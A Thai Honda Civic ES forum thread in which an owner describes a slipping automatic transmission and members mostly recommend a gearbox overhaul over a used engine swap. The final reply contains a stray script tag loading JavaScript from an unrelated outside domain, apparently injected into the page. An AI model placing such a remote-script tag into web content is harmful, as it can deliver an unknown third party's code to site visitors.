ตอบ
ตู๋

ชื่อเล่น: ตู๋ภาชี

เข้าร่วม: 11 พฤศจิกา 2016
ตอบ: 5

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 0
ให้คำขอบคุณ: 6

ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
จันทร์, 5 มิถุนา 2017 01:06 - แนะนำหน่อยครับอาการ ระบบเกียร เริ่มเสีย หรือ เสียครับ
พอดีรถผมขับไปทำงานปกติ ประมาร 18โล แล้วก็จอด คือขับปกติมากๆ แต่พอเวลากลับบ้าน รู้สึกว่า คลัสจะไม่มีแรงกด ออโต้ น่ะครับ ถ้าขับช้าๆพอได้อยู่ ถ้าไม่เกิน 60
รอบเครื่องอยู่ที่ 3500 แต่ถ้า เยียบไป รอบเครื่องขึ้น แต่ความเร็วเท่าเดิม
ผมเลย เปิดไฟขอทางชิดข้าง แล้วลองใส่ R ปรากดว่า นิ่งเลย พอกดไป D ก็นิ่งเหมือนกับ ตกใจมากในตอนนั้น ผมเลยดับเครื่อง ทิ้งไว้ 10 นาที จากนั้น ลองใส่D ค่อยๆออกตัว ลอง เยียบดู คือผล ได้ปกติ ไม่มีอาการได้ๆ พอมาติดไฟแดง ผมก็ ดึงเบรกมือ ใส่ N พอจังหวะ เขียว ก็ใส่D ปกติ คือรถนิ่งเลย ต้องดับ แล้วติดใหม่ตลอด
ก็เลยค่อยๆไป พอถึงบ้าน เช็คน้ำมันเกียรดู สีออกแดง ตรงที่วัดก็ปกติ

อยากรู้ว่า อาการแบบนี้ เสีย หรือ อะไรตัน ออ๋จังหวะ ติดเครื่องใส่ P เร่งๆหน่อย เหมื่อนจะมี เสียง หอนๆ ที่ เกียรด้วย

ถ้าเสีย จะ เปลี่ยนเชียงกง หรือ O/H
หรือจะทำ เกียร mt ดีครับ แนะนำ กับ ราคา ปจุบัน ร้าน ส่วนผมอยู่ อยุธยา

จริงๆแล้ว แอบ เล็ง เครื่องพร้อมเกียร AT/ JP อุปกรครบ ราคา28000 อยู่
รถผมก็ 03 AT EXI 1700 เคยแก็ส

Attached File :
แนะนำหน่อยครับอาการ ระบบเกียร เริ่มเสีย หรือ  เสียครับ
fasang.Mr

ชื่อเล่น: บี

เข้าร่วม: 23 มีนา 2010
ตอบ: 2101

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1764
ให้คำขอบคุณ: 2323

ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 5 มิถุนา 2017 08:15 - แนะนำหน่อยครับอาการ ระบบเกียร เริ่มเสีย หรือ เสียครับ
ความเห็นส่วนตัว Overhaul ดีกว่าอะไหล่ใหม่ใช้กันอีกนาน
ได้รับคำขอบคุณจาก: kanpopza 
ตู๋

น้องใหม่
น้องใหม่

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
จันทร์, 5 มิถุนา 2017 10:30 - แนะนำหน่อยครับอาการ ระบบเกียร เริ่มเสีย หรือ เสียครับ
fasang.Mr พิมพ์ว่า:
ความเห็นส่วนตัว Overhaul ดีกว่าอะไหล่ใหม่ใช้กันอีกนาน

ขอบคุนครับ
Tanadath

เข้าร่วม: 12 มีนา 2011
ตอบ: 1498

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1165
ให้คำขอบคุณ: 325

ปี: 2004
จันทร์, 5 มิถุนา 2017 20:23 - แนะนำหน่อยครับอาการ ระบบเกียร เริ่มเสีย หรือ เสียครับ
โอเวอร์ฮอลดีกว่าครับ เกียร์มือสองไม่แน่นอน มีทั้งดีไม่ดี ตามความเห็นข้างบนครับ
profibus

เข้าร่วม: 16 ธันวา 2012
ตอบ: 803

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1151
ให้คำขอบคุณ: 516

ปี: 2005
อังคาร, 6 มิถุนา 2017 00:24 - แนะนำหน่อยครับอาการ ระบบเกียร เริ่มเสีย หรือ เสียครับ
overhaul บางอู่รับประกัน 1 ปี ก็มีครับลองดูครับ
เครื่อง พร้อมเกียร์ ยุ่น 20,000 น่าจะมีแล้วครับ
ถ้าจะเปลี่ยนเครื่อง ให้อู่หาเครื่องให้ดีกว่าครับ บวกลบ แล้ว
ถึงจะแพงกว่า แต่ซื้อความสบายใจครับ เวลาวางเสร็จเครื่องมีปัญหาจะได้ไม่เกี่ยงกัน

ลอง search คำว่า วิธีtest gear ดูครับ เช็คเบืัองต้น

เลขไมล์เท่าไหร่แล้วครับ
ตู๋

น้องใหม่
น้องใหม่

อังคาร, 6 มิถุนา 2017 01:52 - แนะนำหน่อยครับอาการ ระบบเกียร เริ่มเสีย หรือ เสียครับ
profibus พิมพ์ว่า:
overhaul บางอู่รับประกัน 1 ปี ก็มีครับลองดูครับ
เครื่อง พร้อมเกียร์ ยุ่น 20,000 น่าจะมีแล้วครับ
ถ้าจะเปลี่ยนเครื่อง ให้อู่หาเครื่องให้ดีกว่าครับ บวกลบ แล้ว
ถึงจะแพงกว่า แต่ซื้อความสบายใจครับ เวลาวางเสร็จเครื่องมีปัญหาจะได้ไม่เกี่ยงกัน

ลอง search คำว่า วิธีtest gear ดูครับ เช็คเบืัองต้น

เลขไมล์เท่าไหร่แล้วครับ

เลขไม 140k ครับ
วันนี้ผมลองไปเปลี่ยน น้ำมันเกียรมา โคนมากๆ แต่ที่ดึงก้านวัด ดันใส พอเปลี่ยนเสร็จเอารถออกไปลอง ประมาร 10กว่าโลได้
ปรากดว่า ได้ปกติ แต่พอขับกลับบ้าน มันเริ่มจะเป็นนิดๆ ก็เลย ดึงก้านวัดมา รู้สึกว่า น้ำมันมันเยอะ ผมซัก งงๆ แหละจะเสียหรือไม่เสีย ดับเครื่อง ติดใหม่ก็ขี่ได้ปกติ แต่แค่อย่างรถหยุด มันเหมือน ว่าตอน ช่วงเปลี่ยนเกียรจะกระตุกนิดๆ พอได้รอบก็ขี่ปกติครับ แต่พอความเร็ว 20-30 ก็กลับมาเป็นใหม่
เหมือนมันคลัสไม่จับครับ

ผมไปถามหลายร้าน เขาบอกไม่รับ o/h เขาบอกแก้ไม่จบ ยกใหม่ดีกว่า อะไรแบบนี้ครับ
ตู๋

น้องใหม่
น้องใหม่

อังคาร, 6 มิถุนา 2017 02:13 - แนะนำหน่อยครับอาการ ระบบเกียร เริ่มเสีย หรือ เสียครับ
ขอเพิ่มเติมน่ะครับ ตอนที่ผม เทสเกียร ใส่ D เยียบเบคร ดึงเบครมือ เยียบคันเร่ง รอบเครื่องจะอยู่ ไม่เกิน 2200รอบ
ปล. ตอนติดเครื่องใหม่ ความร้อนได้ที่
แต่พอ อยู่ๆมันก็จะเป็น แต่ในช่วงที่ เปลี่ยน น้ำมันเกียรมาแล้ว
จะไม่มีอาการ ว่างเกียร รถไปแต่ ลื่นๆ
ก่อนหน้านั้นที่ยังไม่เปลี่ยน คือรถไปไม่ได้เลย
ขับแปปๆ ก็ว่างแล้ว

ตอนแรกก็หลงดีใจว่าหายแล้ว แต่ก็ดีขึ้นเห็นได้ชัด
tatam001

เข้าร่วม: 03 ตุลา 2011
ตอบ: 240

มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 171
ให้คำขอบคุณ: 14
อังคาร, 6 มิถุนา 2017 07:57 - แนะนำหน่อยครับอาการ ระบบเกียร เริ่มเสีย หรือ เสียครับ
เกียร์กำลังเสียครับ พวกโอริงมันเสื่อมตามเวลาครับ มันจะเขาเกียร์ได้ยากขึ้นเรื่อยๆ ตอนผมเป็น เวลาเข้าเกียร์ถอยหลัง ต้องรอนานกว่าจะเริ่มถอย ตัดสินใจ o/h เลยครับ เกาะเกียร์ออกมาดูแผ่นคลัชมีสีปกติยังไม่ไหม้ แต่โอริงมันบี้ ไม่กลมเหมือนของใหม่ เนื้อก็แข็งตัวเอามือกดไม่ลง พอo/h เสร็จวิ่งมันเลยครับ ความเห็นผม o/h ดีกว่า ร้านส่วนใหญ่ไม่แนะนำ o/h เพราะ ทำไม่เป็น ทำนาน กำไรน้อย เลยไม่แนะนำ o/hครับ
Thard

ชื่อเล่น: น้องเติ้ด

เข้าร่วม: 22 กันยา 2015
ตอบ: 792

Guru ES
Guru ES

ได้รับคำขอบคุณ: 181
ให้คำขอบคุณ: 65

สี: ขาว ทาฟเฟต้า (NH-578)
อังคาร, 6 มิถุนา 2017 11:02 - แนะนำหน่อยครับอาการ ระบบเกียร เริ่มเสีย หรือ เสียครับ
ฮอนดีกว่าครับ จบกว่าทำเสร็จใช้ได้อีกนาน
ตู๋

น้องใหม่
น้องใหม่

อังคาร, 6 มิถุนา 2017 20:20 - แนะนำหน่อยครับอาการ ระบบเกียร เริ่มเสีย หรือ เสียครับ
tatam001 พิมพ์ว่า:
เกียร์กำลังเสียครับ พวกโอริงมันเสื่อมตามเวลาครับ มันจะเขาเกียร์ได้ยากขึ้นเรื่อยๆ ตอนผมเป็น เวลาเข้าเกียร์ถอยหลัง ต้องรอนานกว่าจะเริ่มถอย ตัดสินใจ o/h เลยครับ เกาะเกียร์ออกมาดูแผ่นคลัชมีสีปกติยังไม่ไหม้ แต่โอริงมันบี้ ไม่กลมเหมือนของใหม่ เนื้อก็แข็งตัวเอามือกดไม่ลง พอo/h เสร็จวิ่งมันเลยครับ ความเห็นผม o/h ดีกว่า ร้านส่วนใหญ่ไม่แนะนำ o/h เพราะ ทำไม่เป็น ทำนาน กำไรน้อย เลยไม่แนะนำ o/hครับ

ขอบคุนครับ อ่างที่ผมบอก ถามหลายร้าน เขาบอกไม่รับ o/h
ผมและเสียใจตรงนี้ ไม่แน่ ผม หาร้านทำไม่ได้ ที่ไกล้ๆ ผม อาจจะ ยกเครื่อง เทค พร้อมเกียรเลย เดิมๆ ผมเป็น exi
tatam001

เข้าร่วม: 03 ตุลา 2011
ตอบ: 240

ได้รับคำขอบคุณ: 171
ให้คำขอบคุณ: 14
พฤหัส, 8 มิถุนา 2017 18:45 - แนะนำหน่อยครับอาการ ระบบเกียร เริ่มเสีย หรือ เสียครับ
ใน web นี้มีร้านทำอยู่มากนะครับ ลองค้นดูสิครับ หากยกเครื่องใหม่ขอเครื่องเดิมนะครับ ผมexi เหมือนกัน
profibus

เข้าร่วม: 16 ธันวา 2012
ตอบ: 803

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1151
ให้คำขอบคุณ: 516

พฤหัส, 8 มิถุนา 2017 23:44 - แนะนำหน่อยครับอาการ ระบบเกียร เริ่มเสีย หรือ เสียครับ
ตู๋ พิมพ์ว่า:
tatam001 พิมพ์ว่า:

ขอบคุนครับ อ่างที่ผมบอก ถามหลายร้าน เขาบอกไม่รับ o/h
ผมและเสียใจตรงนี้ ไม่แน่ ผม หาร้านทำไม่ได้ ที่ไกล้ๆ ผม อาจจะ ยกเครื่อง เทค พร้อมเกียรเลย เดิมๆ ผมเป็น exi

ถ้าเครื่องยังไม่มีปัญหา มาก o/hเกียร์น่าจะดีกว่าครับ

neo19211

ชื่อเล่น: ดำ

เข้าร่วม: 25 มกรา 2016
ตอบ: 10

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 2
ให้คำขอบคุณ: 0

ปี: 2001
สี: ทอง แซทเทิลไลท์ (NH-663M)
เสาร์, 25 พฤศจิกา 2017 22:24 - แนะนำหน่อยครับอาการ ระบบเกียร เริ่มเสีย หรือ เสียครับ
ผมoverhaul มาได้จะ3ปีล่ะโดนไป20000
"<script src="https://sport32news.com/civicesgroup.js">
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.